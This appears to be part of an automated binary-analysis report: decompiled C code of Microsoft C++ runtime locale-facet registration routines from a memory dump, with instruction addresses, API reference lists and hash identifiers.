				void* _t74;
				signed int _t111;
				void* _t121;
				signed int _t123;
				signed int _t124;
				void* _t125;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				void* _t133;
				void* _t134;

				_push(8);
				E0049D90B(0x4d6966, _t121, _t125);
				E00488DEA(_t133 - 0x14, 0);
				_t126 =  *0x4ede60; // 0x0
				 *(_t133 - 4) =  *(_t133 - 4) & 0x00000000;
				 *(_t133 - 0x10) = _t126;
				_t47 = E0042B315( *((intOrPtr*)(_t133 + 8)), E0042B22E(0x4ede40, _t121, _t126, _t134));
				_t122 = _t47;
				if(_t47 != 0) {
					L5:
					E00488E42(_t133 - 0x14);
					return E0049D8D4(_t122);
				} else {
					if(_t126 == 0) {
						_push( *((intOrPtr*)(_t133 + 8)));
						_push(_t133 - 0x10);
						__eflags = E00499D41(_t122, _t126, __eflags) - 0xffffffff;
						if(__eflags == 0) {
							E0042B042(__eflags);
							asm("int3");
							_push(8);
							E0049D90B(0x4d6966, _t122, _t126);
							E00488DEA(_t133 - 0x14, 0);
							_t127 =  *0x4ede68; // 0x0
							 *(_t133 - 4) =  *(_t133 - 4) & 0x00000000;
							 *(_t133 - 0x10) = _t127;
							_t123 = E0042B315( *((intOrPtr*)(_t133 + 8)), E0042B22E(0x4ede48, _t122, _t127, __eflags));
							__eflags = _t123;
							if(_t123 != 0) {
								L12:
								E00488E42(_t133 - 0x14);
								return E0049D8D4(_t123);
							} else {
								__eflags = _t127;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t133 + 8)));
									_push(_t133 - 0x10);
									__eflags = E00499DC6(_t123, _t127, __eflags) - 0xffffffff;
									if(__eflags == 0) {
										E0042B042(__eflags);
										asm("int3");
										_push(8);
										E0049D90B(0x4d6966, _t123, _t127);
										E00488DEA(_t133 - 0x14, 0);
										_t128 =  *0x4ede6c; // 0x0
										 *(_t133 - 4) =  *(_t133 - 4) & 0x00000000;
										 *(_t133 - 0x10) = _t128;
										_t124 = E0042B315( *((intOrPtr*)(_t133 + 8)), E0042B22E(0x4ede4c, _t123, _t128, __eflags));
										__eflags = _t124;
										if(_t124 != 0) {
											L19:
											E00488E42(_t133 - 0x14);
											return E0049D8D4(_t124);
										} else {
											__eflags = _t128;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t133 + 8)));
												_push(_t133 - 0x10);
												_t74 = E00499E32(_t124, _t128, __eflags);
												_pop(_t111);
												__eflags = _t74 - 0xffffffff;
												if(__eflags == 0) {
													E0042B042(__eflags);
													asm("int3");
													_push(4);
													E0049D90B(0x4d6989, _t124, _t128);
													_t129 = _t111;
													 *(_t133 - 0x10) = _t129;
													 *((intOrPtr*)(_t129 + 4)) =  *((intOrPtr*)(_t133 + 0xc));
													_push( *((intOrPtr*)(_t133 + 8)));
													_t41 = _t133 - 4;
													 *_t41 =  *(_t133 - 4) & 0x00000000;
													__eflags =  *_t41;
													 *_t129 = 0x402f68; // executed
													E0049AC63(_t111, _t124, _t129,  *_t41); // executed
													return E0049D8D4(_t129);
												} else {
													_t124 =  *(_t133 - 0x10);
													 *(_t133 - 0x10) = _t124;
													 *(_t133 - 4) = 1;
													E0048919D(_t124);
													 *0x4f02b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 4))))();
													 *0x4ede6c = _t124;
													goto L19;
												}
											} else {
												_t124 = _t128;
												goto L19;
											}
										}
									} else {
										_t123 =  *(_t133 - 0x10);
										 *(_t133 - 0x10) = _t123;
										 *(_t133 - 4) = 1;
										E0048919D(_t123);
										 *0x4f02b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t123 + 4))))();
										 *0x4ede68 = _t123;
										goto L12;
									}
								} else {
									_t123 = _t127;
									goto L12;
								}
							}
						} else {
							_t122 =  *(_t133 - 0x10);
							 *(_t133 - 0x10) = _t122;
							 *(_t133 - 4) = 1;
							E0048919D(_t122);
							 *0x4f02b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t122 + 4))))();
							 *0x4ede60 = _t122;
							goto L5;
						}
					} else {
						_t122 = _t126;
						goto L5;
					}
				}
			}

0x0049981d
0x00499824
0x0049982e
0x00499833
0x0049983e
0x00499842
0x0049984e
0x00499853
0x00499857
0x0049989c
0x0049989f
0x004998ab
0x00499859
0x0049985b
0x00499861
0x00499867
0x0049986f
0x00499872
0x004998ac
0x004998b1
0x004998b2
0x004998b9
0x004998c3
0x004998c8
0x004998d3
0x004998d7
0x004998e8
0x004998ea
0x004998ec
0x00499931
0x00499934
0x00499940
0x004998ee
0x004998ee
0x004998f0
0x004998f6
0x004998fc
0x00499904
0x00499907
0x00499941
0x00499946
0x00499947
0x0049994e
0x00499958
0x0049995d
0x00499968
0x0049996c
0x0049997d
0x0049997f
0x00499981
0x004999c6
0x004999c9
0x004999d5
0x00499983
0x00499983
0x00499985
0x0049998b
0x00499991
0x00499992
0x00499998
0x00499999
0x0049999c
0x004999d6
0x004999db
0x004999dc
0x004999e3
0x004999e8
0x004999ea
0x004999f0
0x004999f3
0x004999f6
0x004999f6
0x004999f6
0x004999fa
0x00499a00
0x00499a0c
0x0049999e
0x0049999e
0x004999a1
0x004999a5
0x004999a9
0x004999b6
0x004999be
0x004999c0
0x00000000
0x004999c0
0x00499987
0x00499987
0x00000000
0x00499987
0x00499985
0x00499909
0x00499909
0x0049990c
0x00499910
0x00499914
0x00499921
0x00499929
0x0049992b
0x00000000
0x0049992b
0x004998f2
0x004998f2
0x00000000
0x004998f2
0x004998f0
0x00499874
0x00499874
0x00499877
0x0049987b
0x0049987f
0x0049988c
0x00499894
0x00499896
0x00000000
0x00499896
0x0049985d
0x0049985d
0x00000000
0x0049985d
0x0049985b

APIs

__EH_prolog3.LIBCMT ref: 00499824
std::_Lockit::_Lockit.LIBCPMT ref: 0049982E

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

moneypunct.LIBCPMT ref: 00499868
std::_Facet_Register.LIBCPMT ref: 0049987F
std::_Lockit::~_Lockit.LIBCPMT ref: 0049989F
Concurrency::cancel_current_task.LIBCPMT ref: 004998AC

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Registermoneypunct
String ID:
API String ID: 1799738296-0
Opcode ID: de08c772e2acb405dd92486b0e539cf298e9208f1be538485e14416e98adfe90
Instruction ID: 173be25e0af6a6ad485d310c2ec6247dbffd84edc721f2b0032609691a1fd12e
Opcode Fuzzy Hash: de08c772e2acb405dd92486b0e539cf298e9208f1be538485e14416e98adfe90
Instruction Fuzzy Hash: 4001AD31D102298BCF05FBA998596BE7B65AF90314F14086EE410AB382CF7D9E018799

Uniqueness

Uniqueness Score: -1.00%

Function 0048C83A, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0048C841
std::_Lockit::_Lockit.LIBCPMT ref: 0048C84B

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

moneypunct.LIBCPMT ref: 0048C885
std::_Facet_Register.LIBCPMT ref: 0048C89C
std::_Lockit::~_Lockit.LIBCPMT ref: 0048C8BC
Concurrency::cancel_current_task.LIBCPMT ref: 0048C8C9

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Registermoneypunct
String ID:
API String ID: 1799738296-0
Opcode ID: 3b6cb409a2f150d9db32ba9a40b159d5f1002f87e096a56cbfac55f0914535f5
Instruction ID: eaf95734eceb6df533cad90a05d1ddaa57abfc5d00c0d80ff92e90dbfc29bab1
Opcode Fuzzy Hash: 3b6cb409a2f150d9db32ba9a40b159d5f1002f87e096a56cbfac55f0914535f5
Instruction Fuzzy Hash: 2901C075D002258BCB05FBA5D8596BE77B5AF84324F14085FE411AB3D2CF7C9E018799

Uniqueness

Uniqueness Score: -1.00%

Function 0048C8CF, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0048C8D6
std::_Lockit::_Lockit.LIBCPMT ref: 0048C8E0

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

moneypunct.LIBCPMT ref: 0048C91A
std::_Facet_Register.LIBCPMT ref: 0048C931
std::_Lockit::~_Lockit.LIBCPMT ref: 0048C951
Concurrency::cancel_current_task.LIBCPMT ref: 0048C95E

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Registermoneypunct
String ID:
API String ID: 1799738296-0
Opcode ID: f21903f133cc2ba64223b78dcfa5b558b85ac9618feb15af69d5e00521a02123
Instruction ID: 3734f5243c17de34b7f124b0e031fee1814de01fd7dfc4dfabcb5e61d80b180e
Opcode Fuzzy Hash: f21903f133cc2ba64223b78dcfa5b558b85ac9618feb15af69d5e00521a02123
Instruction Fuzzy Hash: D101C471E001298BCB05FB69D8566BEB775AF44324F54485FE411AB382CF7C9E01C799

Uniqueness

Uniqueness Score: -1.00%

Function 0048C964, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0048C964(intOrPtr _a8) {
				signed int _v4;
				signed int _v16;
				char _v20;
				void* _v140;
				signed int _t153;
				void* _t279;
				short* _t403;
				void* _t440;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				void* _t453;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t459;
				signed int _t460;
				signed int _t461;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				short* _t466;
				void* _t483;
				void* _t484;

				_push(8);
				E0049D90B(0x4d6966, _t440, _t453);
				E00488DEA( &_v20, 0);
				_t454 =  *0x4eddf0; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t454;
				_t153 = E0042B315(_a8, E0042B22E(0x4edd9c, _t440, _t454, _t484));
				_t441 = _t153;
				if(_t153 != 0) {
					L5:
					E00488E42( &_v20);
					return E0049D8D4(_t441);
				} else {
					if(_t454 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E0048E35E(_t441, _t454, __eflags) - 0xffffffff;
						if(__eflags == 0) {
							E0042B042(__eflags);
							asm("int3");
							_push(8);
							E0049D90B(0x4d6966, _t441, _t454);
							E00488DEA( &_v20, 0);
							_t455 =  *0x4eddec; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t455;
							_t442 = E0042B315(_a8, E0042B22E(0x4edd98, _t441, _t455, __eflags));
							__eflags = _t442;
							if(_t442 != 0) {
								L12:
								E00488E42( &_v20);
								return E0049D8D4(_t442);
							} else {
								__eflags = _t455;
								if(__eflags == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E0048E3E2(_t442, _t455, __eflags) - 0xffffffff;
									if(__eflags == 0) {
										E0042B042(__eflags);
										asm("int3");
										_push(8);
										E0049D90B(0x4d6966, _t442, _t455);
										E00488DEA( &_v20, 0);
										_t456 =  *0x4ede00; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t456;
										_t443 = E0042B315(_a8, E0042B22E(0x4edda4, _t442, _t456, __eflags));
										__eflags = _t443;
										if(_t443 != 0) {
											L19:
											E00488E42( &_v20);
											return E0049D8D4(_t443);
										} else {
											__eflags = _t456;
											if(__eflags == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E0048E467(_t443, _t456, __eflags) - 0xffffffff;
												if(__eflags == 0) {
													E0042B042(__eflags);
													asm("int3");
													_push(8);
													E0049D90B(0x4d6966, _t443, _t456);
													E00488DEA( &_v20, 0);
													_t457 =  *0x4eddd0; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t457;
													_t444 = E0042B315(_a8, E0042B22E(0x4edd7c, _t443, _t457, __eflags));
													__eflags = _t444;
													if(_t444 != 0) {
														L26:
														E00488E42( &_v20);
														return E0049D8D4(_t444);
													} else {
														__eflags = _t457;
														if(__eflags == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E0048E4CF(_t444, _t457, __eflags) - 0xffffffff;
															if(__eflags == 0) {
																E0042B042(__eflags);
																asm("int3");
																_push(8);
																E0049D90B(0x4d6966, _t444, _t457);
																E00488DEA( &_v20, 0);
																_t458 =  *0x4ede04; // 0x0
																_v4 = _v4 & 0x00000000;
																_v16 = _t458;
																_t445 = E0042B315(_a8, E0042B22E(0x4edda8, _t444, _t458, __eflags));
																__eflags = _t445;
																if(_t445 != 0) {
																	L33:
																	E00488E42( &_v20);
																	return E0049D8D4(_t445);
																} else {
																	__eflags = _t458;
																	if(__eflags == 0) {
																		_push(_a8);
																		_push( &_v16);
																		__eflags = E0048E537(_t445, _t458, __eflags) - 0xffffffff;
																		if(__eflags == 0) {
																			E0042B042(__eflags);
																			asm("int3");
																			_push(8);
																			E0049D90B(0x4d6966, _t445, _t458);
																			E00488DEA( &_v20, 0);
																			_t459 =  *0x4eddd4; // 0x0
																			_v4 = _v4 & 0x00000000;
																			_v16 = _t459;
																			_t446 = E0042B315(_a8, E0042B22E(0x4edd80, _t445, _t459, __eflags));
																			__eflags = _t446;
																			if(_t446 != 0) {
																				L40:
																				E00488E42( &_v20);
																				return E0049D8D4(_t446);
																			} else {
																				__eflags = _t459;
																				if(__eflags == 0) {
																					_push(_a8);
																					_push( &_v16);
																					__eflags = E0048E59F(_t446, _t459, __eflags) - 0xffffffff;
																					if(__eflags == 0) {
																						E0042B042(__eflags);
																						asm("int3");
																						_push(8);
																						E0049D90B(0x4d6966, _t446, _t459);
																						E00488DEA( &_v20, 0);
																						_t460 =  *0x4ede08; // 0x0
																						_v4 = _v4 & 0x00000000;
																						_v16 = _t460;
																						_t447 = E0042B315(_a8, E0042B22E(0x4eddac, _t446, _t460, __eflags));
																						__eflags = _t447;
																						if(_t447 != 0) {
																							L47:
																							E00488E42( &_v20);
																							return E0049D8D4(_t447);
																						} else {
																							__eflags = _t460;
																							if(__eflags == 0) {
																								_push(_a8);
																								_push( &_v16);
																								__eflags = E0048E607(_t447, _t460, __eflags) - 0xffffffff;
																								if(__eflags == 0) {
																									E0042B042(__eflags);
																									asm("int3");
																									_push(8);
																									E0049D90B(0x4d6966, _t447, _t460);
																									E00488DEA( &_v20, 0);
																									_t461 =  *0x4eddd8; // 0x0
																									_v4 = _v4 & 0x00000000;
																									_v16 = _t461;
																									_t448 = E0042B315(_a8, E0042B22E(0x4edd84, _t447, _t461, __eflags));
																									__eflags = _t448;
																									if(_t448 != 0) {
																										L54:
																										E00488E42( &_v20);
																										return E0049D8D4(_t448);
																									} else {
																										__eflags = _t461;
																										if(__eflags == 0) {
																											_push(_a8);
																											_push( &_v16);
																											__eflags = E0048E682(_t448, _t461, __eflags) - 0xffffffff;
																											if(__eflags == 0) {
																												E0042B042(__eflags);
																												asm("int3");
																												_push(8);
																												E0049D90B(0x4d6966, _t448, _t461);
																												E00488DEA( &_v20, 0);
																												_t462 =  *0x4ede24; // 0x0
																												_v4 = _v4 & 0x00000000;
																												_v16 = _t462;
																												_t449 = E0042B315(_a8, E0042B22E(0x4eddc8, _t448, _t462, __eflags));
																												__eflags = _t449;
																												if(_t449 != 0) {
																													L61:
																													E00488E42( &_v20);
																													return E0049D8D4(_t449);
																												} else {
																													__eflags = _t462;
																													if(__eflags == 0) {
																														_push(_a8);
																														_push( &_v16);
																														__eflags = E0048E6FD(_t449, _t462, __eflags) - 0xffffffff;
																														if(__eflags == 0) {
																															E0042B042(__eflags);
																															asm("int3");
																															_push(8);
																															E0049D90B(0x4d6966, _t449, _t462);
																															E00488DEA( &_v20, 0);
																															_t463 =  *0x4eddf4; // 0x0
																															_v4 = _v4 & 0x00000000;
																															_v16 = _t463;
																															_t450 = E0042B315(_a8, E0042B22E(0x4edda0, _t449, _t463, __eflags));
																															__eflags = _t450;
																															if(_t450 != 0) {
																																L68:
																																E00488E42( &_v20);
																																return E0049D8D4(_t450);
																															} else {
																																__eflags = _t463;
																																if(__eflags == 0) {
																																	_push(_a8);
																																	_push( &_v16);
																																	__eflags = E0048E769(_t450, _t463, __eflags) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E0042B042(__eflags);
																																		asm("int3");
																																		_push(8);
																																		E0049D90B(0x4d6966, _t450, _t463);
																																		E00488DEA( &_v20, 0);
																																		_t464 =  *0x4ede28; // 0x0
																																		_v4 = _v4 & 0x00000000;
																																		_v16 = _t464;
																																		_t451 = E0042B315(_a8, E0042B22E(0x4eddcc, _t450, _t464, __eflags));
																																		__eflags = _t451;
																																		if(_t451 != 0) {
																																			L75:
																																			E00488E42( &_v20);
																																			return E0049D8D4(_t451);
																																		} else {
																																			__eflags = _t464;
																																			if(__eflags == 0) {
																																				_push(_a8);
																																				_push( &_v16);
																																				__eflags = E0048E7D5(_t451, _t464, __eflags) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E0042B042(__eflags);
																																					asm("int3");
																																					_push(8);
																																					E0049D90B(0x4d6966, _t451, _t464);
																																					E00488DEA( &_v20, 0);
																																					_t465 =  *0x4eddf8; // 0x0
																																					_v4 = _v4 & 0x00000000;
																																					_v16 = _t465;
																																					_t452 = E0042B315(_a8, E0042B22E(0x4edd78, _t451, _t465, __eflags));
																																					__eflags = _t452;
																																					if(_t452 != 0) {
																																						L82:
																																						E00488E42( &_v20);
																																						return E0049D8D4(_t452);
																																					} else {
																																						__eflags = _t465;
																																						if(__eflags == 0) {
																																							_push(_a8);
																																							_push( &_v16);
																																							_t279 = E0048E849(_t452, _t465, __eflags);
																																							_pop(_t403);
																																							__eflags = _t279 - 0xffffffff;
																																							if(__eflags == 0) {
																																								E0042B042(__eflags);
																																								asm("int3");
																																								_push(_t465);
																																								_t466 = _t403;
																																								_t146 = _t466 + 0x10;
																																								 *_t146 =  *(_t466 + 0x10) & 0x00000000;
																																								__eflags =  *_t146;
																																								 *((intOrPtr*)(_t466 + 0x14)) = 7;
																																								 *_t466 = 0;
																																								E00494BE0( *((intOrPtr*)(_t483 + 8)));
																																								return _t466;
																																							} else {
																																								_t452 = _v16;
																																								_v16 = _t452;
																																								_v4 = 1;
																																								E0048919D(_t452);
																																								 *0x4f02b4();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t452 + 4))))();
																																								 *0x4eddf8 = _t452;
																																								goto L82;
																																							}
																																						} else {
																																							_t452 = _t465;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t451 = _v16;
																																					_v16 = _t451;
																																					_v4 = 1;
																																					E0048919D(_t451);
																																					 *0x4f02b4();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t451 + 4))))();
																																					 *0x4ede28 = _t451;
																																					goto L75;
																																				}
																																			} else {
																																				_t451 = _t464;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t450 = _v16;
																																		_v16 = _t450;
																																		_v4 = 1;
																																		E0048919D(_t450);
																																		 *0x4f02b4();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t450 + 4))))();
																																		 *0x4eddf4 = _t450;
																																		goto L68;
																																	}
																																} else {
																																	_t450 = _t463;
																																	goto L68;
																																}
																															}
																														} else {
																															_t449 = _v16;
																															_v16 = _t449;
																															_v4 = 1;
																															E0048919D(_t449);
																															 *0x4f02b4();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t449 + 4))))();
																															 *0x4ede24 = _t449;
																															goto L61;
																														}
																													} else {
																														_t449 = _t462;
																														goto L61;
																													}
																												}
																											} else {
																												_t448 = _v16;
																												_v16 = _t448;
																												_v4 = 1;
																												E0048919D(_t448);
																												 *0x4f02b4();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t448 + 4))))();
																												 *0x4eddd8 = _t448;
																												goto L54;
																											}
																										} else {
																											_t448 = _t461;
																											goto L54;
																										}
																									}
																								} else {
																									_t447 = _v16;
																									_v16 = _t447;
																									_v4 = 1;
																									E0048919D(_t447);
																									 *0x4f02b4();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t447 + 4))))();
																									 *0x4ede08 = _t447;
																									goto L47;
																								}
																							} else {
																								_t447 = _t460;
																								goto L47;
																							}
																						}
																					} else {
																						_t446 = _v16;
																						_v16 = _t446;
																						_v4 = 1;
																						E0048919D(_t446);
																						 *0x4f02b4();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t446 + 4))))();
																						 *0x4eddd4 = _t446;
																						goto L40;
																					}
																				} else {
																					_t446 = _t459;
																					goto L40;
																				}
																			}
																		} else {
																			_t445 = _v16;
																			_v16 = _t445;
																			_v4 = 1;
																			E0048919D(_t445);
																			 *0x4f02b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t445 + 4))))();
																			 *0x4ede04 = _t445;
																			goto L33;
																		}
																	} else {
																		_t445 = _t458;
																		goto L33;
																	}
																}
															} else {
																_t444 = _v16;
																_v16 = _t444;
																_v4 = 1;
																E0048919D(_t444);
																 *0x4f02b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t444 + 4))))();
																 *0x4eddd0 = _t444;
																goto L26;
															}
														} else {
															_t444 = _t457;
															goto L26;
														}
													}
												} else {
													_t443 = _v16;
													_v16 = _t443;
													_v4 = 1;
													E0048919D(_t443);
													 *0x4f02b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t443 + 4))))();
													 *0x4ede00 = _t443;
													goto L19;
												}
											} else {
												_t443 = _t456;
												goto L19;
											}
										}
									} else {
										_t442 = _v16;
										_v16 = _t442;
										_v4 = 1;
										E0048919D(_t442);
										 *0x4f02b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t442 + 4))))();
										 *0x4eddec = _t442;
										goto L12;
									}
								} else {
									_t442 = _t455;
									goto L12;
								}
							}
						} else {
							_t441 = _v16;
							_v16 = _t441;
							_v4 = 1;
							E0048919D(_t441);
							 *0x4f02b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t441 + 4))))();
							 *0x4eddf0 = _t441;
							goto L5;
						}
					} else {
						_t441 = _t454;
						goto L5;
					}
				}
			}

0x0048c964
0x0048c96b
0x0048c975
0x0048c97a
0x0048c985
0x0048c989
0x0048c995
0x0048c99a
0x0048c99e
0x0048c9e3
0x0048c9e6
0x0048c9f2
0x0048c9a0
0x0048c9a2
0x0048c9a8
0x0048c9ae
0x0048c9b6
0x0048c9b9
0x0048c9f3
0x0048c9f8
0x0048c9f9
0x0048ca00
0x0048ca0a
0x0048ca0f
0x0048ca1a
0x0048ca1e
0x0048ca2f
0x0048ca31
0x0048ca33
0x0048ca78
0x0048ca7b
0x0048ca87
0x0048ca35
0x0048ca35
0x0048ca37
0x0048ca3d
0x0048ca43
0x0048ca4b
0x0048ca4e
0x0048ca88
0x0048ca8d
0x0048ca8e
0x0048ca95
0x0048ca9f
0x0048caa4
0x0048caaf
0x0048cab3
0x0048cac4
0x0048cac6
0x0048cac8
0x0048cb0d
0x0048cb10
0x0048cb1c
0x0048caca
0x0048caca
0x0048cacc
0x0048cad2
0x0048cad8
0x0048cae0
0x0048cae3
0x0048cb1d
0x0048cb22
0x0048cb23
0x0048cb2a
0x0048cb34
0x0048cb39
0x0048cb44
0x0048cb48
0x0048cb59
0x0048cb5b
0x0048cb5d
0x0048cba2
0x0048cba5
0x0048cbb1
0x0048cb5f
0x0048cb5f
0x0048cb61
0x0048cb67
0x0048cb6d
0x0048cb75
0x0048cb78
0x0048cbb2
0x0048cbb7
0x0048cbb8
0x0048cbbf
0x0048cbc9
0x0048cbce
0x0048cbd9
0x0048cbdd
0x0048cbee
0x0048cbf0
0x0048cbf2
0x0048cc37
0x0048cc3a
0x0048cc46
0x0048cbf4
0x0048cbf4
0x0048cbf6
0x0048cbfc
0x0048cc02
0x0048cc0a
0x0048cc0d
0x0048cc47
0x0048cc4c
0x0048cc4d
0x0048cc54
0x0048cc5e
0x0048cc63
0x0048cc6e
0x0048cc72
0x0048cc83
0x0048cc85
0x0048cc87
0x0048cccc
0x0048cccf
0x0048ccdb
0x0048cc89
0x0048cc89
0x0048cc8b
0x0048cc91
0x0048cc97
0x0048cc9f
0x0048cca2
0x0048ccdc
0x0048cce1
0x0048cce2
0x0048cce9
0x0048ccf3
0x0048ccf8
0x0048cd03
0x0048cd07
0x0048cd18
0x0048cd1a
0x0048cd1c
0x0048cd61
0x0048cd64
0x0048cd70
0x0048cd1e
0x0048cd1e
0x0048cd20
0x0048cd26
0x0048cd2c
0x0048cd34
0x0048cd37
0x0048cd71
0x0048cd76
0x0048cd77
0x0048cd7e
0x0048cd88
0x0048cd8d
0x0048cd98
0x0048cd9c
0x0048cdad
0x0048cdaf
0x0048cdb1
0x0048cdf6
0x0048cdf9
0x0048ce05
0x0048cdb3
0x0048cdb3
0x0048cdb5
0x0048cdbb
0x0048cdc1
0x0048cdc9
0x0048cdcc
0x0048ce06
0x0048ce0b
0x0048ce0c
0x0048ce13
0x0048ce1d
0x0048ce22
0x0048ce2d
0x0048ce31
0x0048ce42
0x0048ce44
0x0048ce46
0x0048ce8b
0x0048ce8e
0x0048ce9a
0x0048ce48
0x0048ce48
0x0048ce4a
0x0048ce50
0x0048ce56
0x0048ce5e
0x0048ce61
0x0048ce9b
0x0048cea0
0x0048cea1
0x0048cea8
0x0048ceb2
0x0048ceb7
0x0048cec2
0x0048cec6
0x0048ced7
0x0048ced9
0x0048cedb
0x0048cf20
0x0048cf23
0x0048cf2f
0x0048cedd
0x0048cedd
0x0048cedf
0x0048cee5
0x0048ceeb
0x0048cef3
0x0048cef6
0x0048cf30
0x0048cf35
0x0048cf36
0x0048cf3d
0x0048cf47
0x0048cf4c
0x0048cf57
0x0048cf5b
0x0048cf6c
0x0048cf6e
0x0048cf70
0x0048cfb5
0x0048cfb8
0x0048cfc4
0x0048cf72
0x0048cf72
0x0048cf74
0x0048cf7a
0x0048cf80
0x0048cf88
0x0048cf8b
0x0048cfc5
0x0048cfca
0x0048cfcb
0x0048cfd2
0x0048cfdc
0x0048cfe1
0x0048cfec
0x0048cff0
0x0048d001
0x0048d003
0x0048d005
0x0048d04a
0x0048d04d
0x0048d059
0x0048d007
0x0048d007
0x0048d009
0x0048d00f
0x0048d015
0x0048d016
0x0048d01c
0x0048d01d
0x0048d020
0x0048d05a
0x0048d05f
0x0048d063
0x0048d067
0x0048d06b
0x0048d06b
0x0048d06b
0x0048d06f
0x0048d076
0x0048d079
0x0048d082
0x0048d022
0x0048d022
0x0048d025
0x0048d029
0x0048d02d
0x0048d03a
0x0048d042
0x0048d044
0x00000000
0x0048d044
0x0048d00b
0x0048d00b
0x00000000
0x0048d00b
0x0048d009
0x0048cf8d
0x0048cf8d
0x0048cf90
0x0048cf94
0x0048cf98
0x0048cfa5
0x0048cfad
0x0048cfaf
0x00000000
0x0048cfaf
0x0048cf76
0x0048cf76
0x00000000
0x0048cf76
0x0048cf74
0x0048cef8
0x0048cef8
0x0048cefb
0x0048ceff
0x0048cf03
0x0048cf10
0x0048cf18
0x0048cf1a
0x00000000
0x0048cf1a
0x0048cee1
0x0048cee1
0x00000000
0x0048cee1
0x0048cedf
0x0048ce63
0x0048ce63
0x0048ce66
0x0048ce6a
0x0048ce6e
0x0048ce7b
0x0048ce83
0x0048ce85
0x00000000
0x0048ce85
0x0048ce4c
0x0048ce4c
0x00000000
0x0048ce4c
0x0048ce4a
0x0048cdce
0x0048cdce
0x0048cdd1
0x0048cdd5
0x0048cdd9
0x0048cde6
0x0048cdee
0x0048cdf0
0x00000000
0x0048cdf0
0x0048cdb7
0x0048cdb7
0x00000000
0x0048cdb7
0x0048cdb5
0x0048cd39
0x0048cd39
0x0048cd3c
0x0048cd40
0x0048cd44
0x0048cd51
0x0048cd59
0x0048cd5b
0x00000000
0x0048cd5b
0x0048cd22
0x0048cd22
0x00000000
0x0048cd22
0x0048cd20
0x0048cca4
0x0048cca4
0x0048cca7
0x0048ccab
0x0048ccaf
0x0048ccbc
0x0048ccc4
0x0048ccc6
0x00000000
0x0048ccc6
0x0048cc8d
0x0048cc8d
0x00000000
0x0048cc8d
0x0048cc8b
0x0048cc0f
0x0048cc0f
0x0048cc12
0x0048cc16
0x0048cc1a
0x0048cc27
0x0048cc2f
0x0048cc31
0x00000000
0x0048cc31
0x0048cbf8
0x0048cbf8
0x00000000
0x0048cbf8
0x0048cbf6
0x0048cb7a
0x0048cb7a
0x0048cb7d
0x0048cb81
0x0048cb85
0x0048cb92
0x0048cb9a
0x0048cb9c
0x00000000
0x0048cb9c
0x0048cb63
